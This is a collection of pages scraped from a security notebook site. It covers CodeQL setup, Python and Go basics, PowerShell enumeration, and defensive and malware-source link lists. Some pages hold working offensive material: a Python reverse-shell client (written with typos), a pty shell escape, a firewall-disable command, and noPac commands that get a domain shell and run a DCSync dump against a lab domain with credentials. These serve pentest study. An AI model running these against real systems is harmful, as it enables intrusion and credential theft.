easybuggy is a Java app and added that language in line #40 of the screenshot 1. Ensure that Github has detected the correct language for scanning and edit accordingly 2. Configure the push/pull branches for scanning based on your needs 3. Click commit changes on the right of the screen ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-c5a9f7b1f865002f058d97b0cf2e207c4d858d32%252F4.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=c9e5d2d1&sv=2) 1. Select "Create a new branch..." so that a new branch can be created just in case Github's autobuild feature doesn't work as intended ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-cdb37ee1b5e394d0768f1f0af55c4f35a67dedba%252F5.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=d37d9ac8&sv=2) 1. Click "Propose Changes" to draft the pull request and annotate any description information if needed. ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-c0efcef2ab50cb1d5c10e2100441e3e30184bb62%252F6.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=ea2f752a&sv=2) 1. Click "Create Pull Request" to start the job ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-6eedd8bb3ade417bfa6a50dff3c26b9d2b196078%252F7.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=8532a5e6&sv=2) 1. Visit the Actions tab when the job is complete to see the workflow runs ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-4362dca5e91f44d68619d1a02c8e7338395923e8%252F8.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=b6e6f7bb&sv=2) 1. Select the run and see if the build completed without issues 2. If the job fails, this could mean that the Autobuild process needs some adjustments for success. This happens when your application has a different/custom build outside of the standard build process. This can be corrected by configuring the correct settings in the YAML file. 3. Once the job completes, click into the run to see the stages of the build and analysis ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-061d82218104f411cf535da0f8ff3c9fbe1584ae%252F9%2520%281%29.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=b841d867&sv=2) Successful build and analysis 1. Now go to **Pull Requests** and merge the request into master branch for results ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-1d7474c935af62221fcaeb8f8b793fb33fef189e%252Fmerge%2520%25233.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=8652a052&sv=2) 1. Go to the **Security** tab and select **code scanning** to see the results of the scan ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-2c81594d941ea7b9c6483ce7d74ae3d7d4a47db8%252F10.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=cd8cedc8&sv=2) 1. Now every time there is a pull request from the master branch, this will show if there are any issues with the code before merging [PreviousSAST/SCA](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca) [NextJavaScript Security Analysis](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis) Last updated 1 year ago --- # Python Snippets | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/coding-programming/python/python.md) . Simple Reverse connection SSH login escape Base64 Web image decoder Password Generator Redirect.py Copy import socket import subprocess REMOTE_HOST = '10.X.X.X' REMOTE_HOST = 4231 client = socket.socket() print ("Starting Connection..." client.connect((REMOTE_HOST, REMOTE _PORT)) print ("Connected") while True: print ("Command Awaiting") command = client.recv(1024) command = command.decode() op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE) said = op.stdout.read() error_said = op.stderr.read() print("Send Response") client.send (said + error_said) [PreviousPython Basics for Pentesters](https://martian1337.gitbook.io/notes/notes/coding-programming/python/python-basics-for-pentesters) [NextXML Basics with Python](https://martian1337.gitbook.io/notes/notes/coding-programming/python/xml-basics-with-python) Last updated 1 year ago Copy ssh user@host "python -c \"import pty; pty.spawn('/bin/bash")\"" Copy # Save the data value to a text file (image.txt) and run the script below to generate an image. #!/bin/python import base64 file = open('image.txt', 'rb') encoded_data = file.read() file.close() decoded_data = base64.b64decode((encoded_data)) # Does not have to be png format img_file = open('image.png','wb') img_file.write(decoded_data) img_file.close() Copy # Random Password generator. Insert additional characters as desired import os Characters = "aAbBcC3dDeEfFg9GHh2IiJjK8kLlM0m4N&nOoPpQq7RrSs1Tt#5UuVvWwXxYy6Zz" Length = int(input("Length: ")) urandom = os.urandom(Length) Index = "" for i in range(Length): Index+=Characters[ord(os.urandom(1)) % len(Characters)] print(Index) Copy #!/usr/bin/python3 import sys from http.server import HTTPServer, BaseHTTPRequestHandler class Redirect(BaseHTTPRequestHandler): def do_GET(self): self.send_response(302) self.send_header('Location', sys.argv[1]) self.end_headers() HTTPServer(("0.0.0.0", 80), Redirect).serve_forever() --- # Quick Notes | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes.md) . [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#syntax) Syntax ------------------------------------------------------------------------------------------------------- ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-7e45d38f55c7e2828c0d02e09f1c220a5ffb0b8b%252Fimage%2520%2811%29.png%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=86772dbe&sv=2) [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#strings) Strings --------------------------------------------------------------------------------------------------------- Strings are defined either with a single quote or a double quotes. Strings are bits of text. They can be defined as anything between quotes. You can also use single quotes to assign a string. However, you will face problems if the value to be assigned itself contains single quotes. The difference between the two is that using double quotes makes it easy to include apostrophes (whereas these would terminate the string if using single quotes) There are additional variations on defining strings that make it easier to include things such as carriage returns, backslashes and Unicode characters. These are beyond the scope of this tutorial, but are covered in the [Python documentation](http://docs.python.org/tutorial/introduction.html#strings) . Simple operators can be executed on numbers and strings Assignments can be done on more than one variable "simultaneously" on the same line Mixing operators between numbers and strings is not supported [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#lists) Lists ----------------------------------------------------------------------------------------------------- Lists are very similar to arrays. They can contain any type of variable, and they can contain as many variables as you wish. Lists can also be iterated over in a very simple manner. Accessing an index which does not exist generates an exception (an error). [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#arithmetic-operators) Arithmetic Operators ----------------------------------------------------------------------------------------------------------------------------------- The addition, subtraction, multiplication, and division operators can be used with numbers. Another operator available is the modulo (%) operator, which returns the integer remainder of the division. dividend % divisor = remainder. Using two multiplication symbols makes a power relationship. `7**2` is 7 squared ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#using-operators-with-strings) Using Operators with Strings Python supports concatenating strings using the addition operator Python also supports multiplying strings to form a string with a repeating sequence Lists can be joined with the addition operators Just as in strings, Python supports forming new lists with a repeating sequence using the multiplication operator [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#string-formatting) String Formatting ----------------------------------------------------------------------------------------------------------------------------- Python uses C-style string formatting to create new, formatted strings. The "%" operator is used to format a set of variables enclosed in a "tuple" (a fixed size list), together with a format string, which contains normal text together with "argument specifiers", special symbols like "%s" and "%d". To use two or more argument specifiers, use a tuple (parentheses) Any object which is not a string can be formatted using the %s operator as well. The string which returns from the "repr" method of that object is formatted as the string. Here are some basic argument specifiers: `%s - String (or any object with a string representation, like numbers)` `%d - Integers` `%f - Floating point numbers` `%.f - Floating point numbers with a fixed amount of digits to the right of the dot.` `%x/%X - Integers in hex representation (lowercase/uppercase)` Example: [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#conditions) Conditions --------------------------------------------------------------------------------------------------------------- Python uses boolean logic to evaluate conditions. The boolean values True and False are returned when an expression is compared or evaluated. Variable assignment is done using a single equals operator "=", whereas comparison between two variables is done using the double equals operator "==". The "not equals" operator is marked as "!=". ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#boolean-operators) Boolean operators The "`and`" and "`or`" boolean operators allow building complex boolean expressions #### [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#the-in-operator) The "in" operator The "`in`" operator could be used to check if a specified object exists within an iterable object container, such as a list. Python uses indentation to define code blocks, instead of brackets. The standard Python indentation is 4 spaces, although tabs and any other space size will work, as long as it is consistent. Code blocks do not need any termination. A statement is evaluated as true if one of the following is correct: 1\. The "True" Boolean variable is given, or calculated using an expression, such as an arithmetic comparison. 2\. An object which is not considered "empty" is passed. #### [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#the-is-operator) The 'is' operator Unlike the double equals operator "`==`", the "`is`" operator does not match the values of the variables, but the instances themselves. #### [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#the-not-operator) The "not" operator Using "`not`" before a boolean expression inverts it. [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#loops) Loops ----------------------------------------------------------------------------------------------------- There are two types of loops in Python, for and while. ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#the-for-loop) The "for" loop For loops iterate over a given sequence. For loops can iterate over a sequence of numbers using the "range" and "xrange" functions. The difference between range and xrange is that the range function returns a new list with numbers of that specified range, whereas xrange returns an iterator, which is more efficient. (Python 3 uses the range function, which acts like xrange). The range function is zero based. ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#while-loops) "while" loops While loops repeat as long as a certain boolean condition is met. ### [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#break-and-continue-statements) "break" and "continue" statements **break** is used to exit a for loop or a while loop, whereas **continue** is used to skip the current block, and return to the "for" or "while" statement. #### [](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#can-we-use-else-clause-for-loops) Can we use "else" clause for loops? Unlike languages like C,CPP.. we can use **else** for loops. When the loop condition of "for" or "while" statement fails then code part in "else" is executed. If a **break** statement is executed inside the for loop then the "else" part is skipped. Note that the "else" part is executed even if there is a **continue** statement. [PreviousPython](https://martian1337.gitbook.io/notes/notes/coding-programming/python) [NextPython Basics for Pentesters](https://martian1337.gitbook.io/notes/notes/coding-programming/python/python-basics-for-pentesters) Last updated 1 year ago * [Syntax](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#syntax) * [Strings](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#strings) * [Lists](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#lists) * [Arithmetic Operators](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#arithmetic-operators) * [Using Operators with Strings](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#using-operators-with-strings) * [String Formatting](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#string-formatting) * [Conditions](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#conditions) * [Boolean operators](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#boolean-operators) * [Loops](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#loops) * [The "for" loop](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#the-for-loop) * ["while" loops](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#while-loops) * ["break" and "continue" statements](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes#break-and-continue-statements) Copy data = ("Martian", "from CyberSpace", 53.44) format_string = "Hello %s %s. Your current balance is $%s." print(format_string % data) --- # PowerShell | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/common-system-task-info/powershell.md) . Enumeration Live Examination Applications/Services Logging/Monitoring The output of the `systeminfo` provides information about the machine, including the operating system name and version, hostname, and other hardware information as well as the AD domain Copy systeminfo | findstr Domain Enumerate for any/all (\*) users on the martianredteam.com domain Copy Get-ADUser -Filter * -SearchBase "CN=User1,CN=Users,DC=Martianredteam,DC=com" Check if Windows Defender Service is installed Copy Get-Service WinDefend Check if Windows Defender is running RTP Copy Get-MpComputerStatus | select RealTimeProtectionEnabled Check for Host-Based firewall and output result to table Copy Get-NetFirewallProfile | Format-Table Name, Enabled Disable host based Firewall (Admin Privilege) Copy Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False Review Host Based Firewall rules Copy Get-NetFirewallRule | select DisplayName, Enabled, Description Test inbound connection on port 80 and whether it is allowed by the firewall Copy Test-NetConnection -ComputerName 127.0.0.1 -Port 80 ### [](https://martian1337.gitbook.io/notes/notes/common-system-task-info/powershell#live-examination-1) Live examination **Get-Process** Command Description `Get-Process` Get brief information about running processes `Get-Process 'powersh*'` Get brief information about a named process with a wildcard `Get-Process 'powershell' | Select-Object *` Detailed information about a running process `Get-Process -ComputerName MartianPC` Information about processes on a remote system **Get-CimInstance** Command Description `Get-CimInstance -Class Win32_Process | Select-Object ProcessId, ProcessName, CommandLine` Returns an object with Windows process information `Get-CimInstance -Class Win32_Process | Where-Object -Property ParentProcessId -EQ 1337` Returns an object with Windows process information where ParentProcessId is 1337 **Get-NetTCPConnection** Command Description `Get-NetTCPConnection` Displays several network connection information `Get-NetTCPConnection -State Listen` Display listening connections `Get-NetTCPConnection -State Listen | Select-Object -Property LocalAddress, LocalPort, OwningProcess` Display listening connections by property **Get-Service** Command Description `Get-Service nginx` Get information about running servies `Get-Service nginx | Select-Object -Property *` Display the properties of a service **Get-LocalUser and Get-LocalGroup** Command Description `Get-LocalUser` List all local users `Get-LocalUser Martian` List user information by username `Get-LocalUser | Where-Object -Property Enabled -EQ $true` List local users with enabled accounts `Get-LocalUser | Where-Object -Property Enabled -EQ $false` List local users with disabled accounts `Get-LocalGroup` List all local groups `Get-LocalGroup Administrators` Lists the Administrators group `Get-LocalGroupMember Administrators` Lists the members of the Administrators Group **Get-Process** Command Description `Get-Process` Get brief information about running processes `Get-Process 'powersh*'` Get brief information about a named process with a wildcard `Get-Process 'powershell' | Select-Object *` Detailed information about a running process `Get-Process -ComputerName MartianPC` Information about processes on a remote system **Get-CimInstance** Command Description `Get-CimInstance -Class Win32_Process | Select-Object ProcessId, ProcessName, CommandLine` Returns an object with Windows process information `Get-CimInstance -Class Win32_Process | Where-Object -Property ParentProcessId -EQ 1337` Returns an object with Windows process information where ParentProcessId is 1337 **Get-NetTCPConnection** Command Description `Get-NetTCPConnection` Displays several network connection information `Get-NetTCPConnection -State Listen` Display listening connections `Get-NetTCPConnection -State Listen | Select-Object -Property LocalAddress, LocalPort, OwningProcess` Display listening connections by property **Get-Service** Command Description `Get-Service nginx` Get information about running servies `Get-Service nginx | Select-Object -Property *` Display the properties of a service **Get-LocalUser and Get-LocalGroup** Command Description `Get-LocalUser` List all local users `Get-LocalUser Martian` List user information by username `Get-LocalUser | Where-Object -Property Enabled -EQ $true` List local users with enabled accounts `Get-LocalUser | Where-Object -Property Enabled -EQ $false` List local users with disabled accounts `Get-LocalGroup` List all local groups `Get-LocalGroup Administrators` Lists the Administrators group `Get-LocalGroupMember Administrators` Lists the members of the Administrators Group **Get-Process** Command Description `Get-Process` Get brief information about running processes `Get-Process 'powersh*'` Get brief information about a named process with a wildcard `Get-Process 'powershell' | Select-Object *` Detailed information about a running process `Get-Process -ComputerName MartianPC` Information about processes on a remote system **Get-CimInstance** Command Description `Get-CimInstance -Class Win32_Process | Select-Object ProcessId, ProcessName, CommandLine` Returns an object with Windows process information `Get-CimInstance -Class Win32_Process | Where-Object -Property ParentProcessId -EQ 1337` Returns an object with Windows process information where ParentProcessId is 1337 **Get-NetTCPConnection** Command Description `Get-NetTCPConnection` Displays several network connection information `Get-NetTCPConnection -State Listen` Display listening connections `Get-NetTCPConnection -State Listen | Select-Object -Property LocalAddress, LocalPort, OwningProcess` Display listening connections by property **Applications/Services** list the running services using `net start` to check if there are any interesting running services Look for a service with the name `Martian Demo` If a process exists, get information about the process Search if process 3212 is listening for a network service Get a list of available event logs on the local machine using the `Get-EventLog` cmdlet Look for a process or service that has been named "Sysmon" within the current process/service Look for a service that has been named "Sysmon" within the current service Check registry for Sysmon tool [PreviousLinux Basics](https://martian1337.gitbook.io/notes/notes/common-system-task-info/basic-linux-for-ctfs) [NextApp Pentest Toolkit](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit) Last updated 1 year ago Copy net start Copy wmic service where "name like 'Martian Demo'" get Name,PathName Copy Get-Process -Name martian-demo Copy netstat -noa |findstr "LISTENING" |findstr "3212" Copy Get-EventLog -List Copy Get-Process | Where-Object { $_.ProcessName -eq "Sysmon" } Copy Get-CimInstance win32_service -Filter "Description = 'System Monitor service'" Copy reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operationalw --- # Defensive | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/defensive-cybersecurity.md) . General Training Intel DFIR Malware Vulnerability Scans [Atlant Security Windows Hardening Scripts](https://github.com/atlantsecurity/windows-hardening-scripts) ! [Awesome Forensics](https://cugu.github.io/awesome-forensics/) [Awesome Threat Intelligence Repo](https://github.com/hslatman/awesome-threat-intelligence) [Random Powershell Tasks from @adbertram](https://github.com/adbertram/Random-PowerShell-Work) [EyeHateMalwares](https://eyehatemalwares.com/) ! [Pylirt](https://github.com/anil-yelken/pylirt) - Python IR toolkit for linux [Steven Black host file](https://github.com/StevenBlack/hosts) **KQL Training** [https://detective.kusto.io/](https://detective.kusto.io/) ### [](https://martian1337.gitbook.io/notes/resources/defensive-cybersecurity#feeds-trends-and-intel) Feeds, Trends, and Intel * [Cyber Threat Intelligence Dashboard by infosecn1nja](https://start.me/p/wMrA5z/cyber-threat-intelligence) ! * [CVE Trends Crowdsourced CVE Intel](https://cvetrends.com/) * [Abuse.ch Malware URL Exchange](https://urlhaus.abuse.ch/) * [Phishing Army: Phishing URL Blocklist](https://phishing.army/) * [Unified Hosts Blacklist: Host file for malicious URL Blocking, updated daily](https://github.com/Ultimate-Hosts-Blacklist/Ultimate.Hosts.Blacklist) * [APT Index (National Security Cyber War Map)](https://embed.kumu.io/0b023bf1a971ba32510e86e8f1a38c38#apt-index) General [ADHD](https://www.blackhillsinfosec.com/projects/adhd/) [Awesome Event IDs Repo](https://github.com/stuhli/awesome-event-ids) [BinaryAlert](https://github.com/airbnb/binaryalert) [BZAR](https://github.com/mitre-attack/bzar) [CimSweep](https://github.com/PowerShellMafia/CimSweep) [Cybersecurity IR Repo](https://github.com/paulveillard/cybersecurity-incident-response) [DeepBlueCLI](https://github.com/sans-blue-team/DeepBlueCLI) [DeTTECT](https://github.com/rabobank-cdc/DeTTECT) [DFIR Diva](https://dfirdiva.com/) ! [EQL Analytics Library](https://github.com/endgameinc/eqllib) [Fast Incident Response](https://github.com/certsocietegenerale/FIR) [GMER Windows Rootkit Scanner](http://www.gmer.net/#files) [Google Rapid Response (GRR)](https://github.com/google/grr) [Hollows Hunter](https://github.com/hasherezade/hollows_hunter) [Loki](https://github.com/grafana/loki) [Meerkat](https://github.com/TonyPhipps/Meerkat) [Memoryze](https://fireeye.market/apps/211368) [Monitor](https://fireeye.market/apps/211360) [Oriana](https://github.com/mvelazc0/Oriana/) [OSSEM](https://github.com/OTRF/OSSEM) [Persistence Sniper from @last-byte](https://github.com/last-byte/PersistenceSniper) [PiRogue Tool Suite (Mobile Device Forensics)](https://github.com/PiRogueToolSuite) [PowerGRR](https://github.com/swisscom/PowerGRR) [rkhunter Linux RootKit Scanner](https://salsa.debian.org/pkg-security-team/rkhunter) [SANS Sift Workstation Forensic Tool](https://www.sans.org/tools/sift-workstation/) [FTK Imager](https://www.exterro.com/forensic-toolkit) ! [IoT Digital Forensics course](https://github.com/RJC497/IoT-Digital-Forensics-Course) (free) [C2-Hunter](https://github.com/ZeroMemoryEx/C2-Hunter) - Real-time extraction of C2 traffic **File/email analysis and sandboxes** [MxToolbox](https://mxtoolbox.com/EmailHeaders.aspx) - Online email headerr analysis [VirusTotlal](https://www.virustotal.com/gui/home/search) [AnyRun](https://any.run/) - Online Sandbox [Hybrid-Analysis](https://www.hybrid-analysis.com/) \- Online Sandbox [Joe Sandbox](https://www.joesandbox.com/#windows) [VMRay Sandbox](https://www.vmray.com/) [Browserling](https://app.gitbook.com/s/iTTNU6nxIY2fbSYQhK15/group-1/engagement-contacts) - Browser Sandbox **M365 and Azure AD Incident Response** [Azure AD Investigator PowerShell module](https://github.com/AzureAD/Azure-AD-Incident-Response-PowerShell-Module) [AzureAD Security Assessment](https://github.com/AzureAD/AzureADAssessment) [Mandiant Azure AD Investigator](https://github.com/mandiant/Mandiant-Azure-AD-Investigator) [CISA Sparrow](https://github.com/cisagov/Sparrow) [CrowdStrike Reporting Tool for Azure (CRT)](https://github.com/CrowdStrike/CRT) [Hawk](https://github.com/T0pCyber/hawk) [AzureHound](https://github.com/BloodHoundAD/AzureHound) [Office 365 Extractor](https://github.com/PwC-IR/Office-365-Extractor) [Azure Sentinel Detections](https://github.com/Azure/Azure-Sentinel/tree/master/Detections) **Malware Analysis Tools** [Qu1cksc0pe](https://github.com/CYB3RMX/Qu1cksc0pe) - All-in-one MA **Malware Analysis Sites** * [Malware Database (MWDB)](https://virus.exchange/login) Must have account [VirusTotal](https://www.virustotal.com/) [Kasperky](https://opentip.kaspersky.com/) [Intezer](https://analyze.intezer.com/) [Cuckoo Sandbox](https://cuckoo.cert.ee/) [Hybrid Analysis](https://www.hybrid-analysis.com/) [Triage](https://tria.ge/) - Online VM [Any.Run](https://app.any.run/) - Online VM [Opswat](https://metadefender.opswat.com/) [Filescan.io](https://www.filescan.io/) [Unpac.me](https://www.unpac.me/) - Automated Unpacking Service [Malware Bazaar](https://bazaar.abuse.ch/) **Malware Resources for Analysis/Reverse Engineering** USE SANDBOXED ENVIRONMENT !!! [Aoyama\_](https://github.com/Leeon123/Aoyama) [Arbitrium-RAT\_](https://github.com/im-hanzou/Arbitrium-RAT) [blackvision](https://github.com/quantumcore/blackvision) [botnets](https://github.com/maestron/botnets) [Deus x64 reverse engineering/binary exploitation wargames](https://deusx64.ai/) ! [DDOS-RootSec](https://github.com/R00tS3c/DDOS-RootSec) [Fsociety-ransomware-MrRobot](https://github.com/graniet/fsociety-ransomware-MrRobot) [ghost](https://github.com/AHXR/ghost) [HBot](https://github.com/Its-Vichy/HBot) [Malware Collection Repo](https://github.com/Red-Laboratory/Malware-collection) ! [Malware Repo from @gbrindisi](https://github.com/gbrindisi/malware) [Malware Repo from @kaiserfarrell](https://github.com/kaiserfarrell/malware) [MalwareDatabase](https://github.com/Endermanch/MalwareDatabase) [Ransomware](https://github.com/im-hanzou/Ransomware) [MalwareSourceCode](https://github.com/vxunderground/MalwareSourceCode) ! [web-malware-collection\_](https://github.com/nikicat/web-malware-collection) [javascript-malware-collection](https://github.com/HynekPetrak/javascript-malware-collection) [Malware-samples Repo from @InQuest](https://github.com/InQuest/malware-samples) [MalWAReX](https://github.com/0x48piraj/MalWAReX) [Joas (@CybersecurityUP) Malware and Reverse Engineering Collection](https://github.com/CyberSecurityUP/Awesome-Malware-Analysis-Reverse-Engineering) ! [paradoxiaRAT](https://github.com/quantumcore/paradoxiaRAT) [malware-samples\_](https://github.com/fabrimagic72/malware-samples) [BlackHAck](https://github.com/AngelSecurityTeam/BackHAck) [Recreator-Backdoor\_](https://github.com/AngelSecurityTeam/Recreator-Backdoor) [malware](https://github.com/RamadhanAmizudin/malware) [TinyNuke](https://github.com/RamadhanAmizudin/TinyNuke) [supercharge](https://github.com/quantumcore/supercharge) [maalik](https://github.com/quantumcore/maalik) [claw](https://github.com/quantumcore/claw) [Crypter](https://github.com/sithis993/Crypter) [Reverse Engineering 101](https://malwareunicorn.org/workshops/re101.html#0) [Cuckoo online Sandbox](https://cuckoosandbox.org/) ! [Nessus](https://www.tenable.com/products/nessus) [Scan4all from @hktalent](https://github.com/hktalent/scan4all) [Androbugs Android Vulnerability Scanner](https://github.com/androbugs2/androbugs2) [PreviousLLM Pentesting](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/llm-pentesting) [NextGeneral Cybersecurity](https://martian1337.gitbook.io/notes/resources/general-cybersecurity) Last updated 6 months ago --- # Entry Points | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/entry-points.md) . Like most compiled and statically typed lamguages such as C, C++, Assembler, Fortran etc Golang has a main entry point and a sub entry point that is optional. What do I mean when I say sub entry point and main entry point. The main entry point of a golang program is defined as `main` while a sub entry point is called `init`. These are both possible entry points that can be placed wherever in the file. #### [](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/entry-points#the-init-sub-entry-point) The `init` sub entry point### Golang has a weird file layout which we will go over in a second, but for now lets go over the entry points. The first entry point we are going over is the optional entry point. This function is defined like so. Copy func init() { // Golang code here } The init function and entry point can be defined in multiple places throughout the entire source code file or project solution. In this case, an initation function or sub entry point is a function that is typically used for initation of a program. This means that whatever is under the `init` function will run before main. So, we can build a program to do a small mathematical operation and print it to the screen. Copy func init() { println(2 + 20) // Output: 22 } and this will then be run before main. This entry point is not a primary entry point for go and can not be used as a final entry point to the program, so we need to use `main` #### [](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/entry-points#the-main-entry-point) The `main` entry point This is the actual program entry point within the program, this MUST be declared for a go program to run. To declare a main function we can do it as shown below. Copy func main() { // main code and calls here } and when we run our program it will execute. #### [](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/entry-points#clashing-with-init-and-main-or-rules) Clashing with init and main | Rules INIT functions CAN NOT BE CALLED. This is because the go compiler will prioritize these calls on the backend already and double calling an initation function is not directly supported or should be done anyway. Below is a list of rules for init and main functions > `init` or `main` functions can NOT be called by the user In order to use a `init` function `main` must be declared `init` functions can be declared in any source code file `main` functions have to be placed in a .go source code file with the package of `main` [PreviousModules](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/modules) [NextFile Forensics](https://martian1337.gitbook.io/notes/notes/coding-programming/golang/file-forensics) Last updated 1 year ago --- # Bleeding Edge Vulnerabilities | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities.md) . [](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities#nopac-samaccountname-spoofing) NoPac (SamAccountName Spoofing) ---------------------------------------------------------------------------------------------------------------------------------------------------------------- This vulnerability encompasses two CVEs 2021-42278 and 2021-42287, allowing for intra-domain privilege escalation from any standard domain user to Domain Admin level access in one single command. This exploit path takes advantages of being able to change the SamAccountName ### [](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities#getting-shell) Getting Shell Copy sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap ### [](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities#dcsync-attack) DCSync Attack Copy sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator [](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities#petitpotom) PetitPotom ------------------------------------------------------------------------------------------------------------------------ PetitPotam (CVE-2021-36942) is an LSA spoofing vulnerability that was patched in August of 2021. The flaw allows an unauthenticated attacker to coerce a Domain Controller to authenticate against another host using NTLM over port 445 via the Local Security Authority Remote Protocol 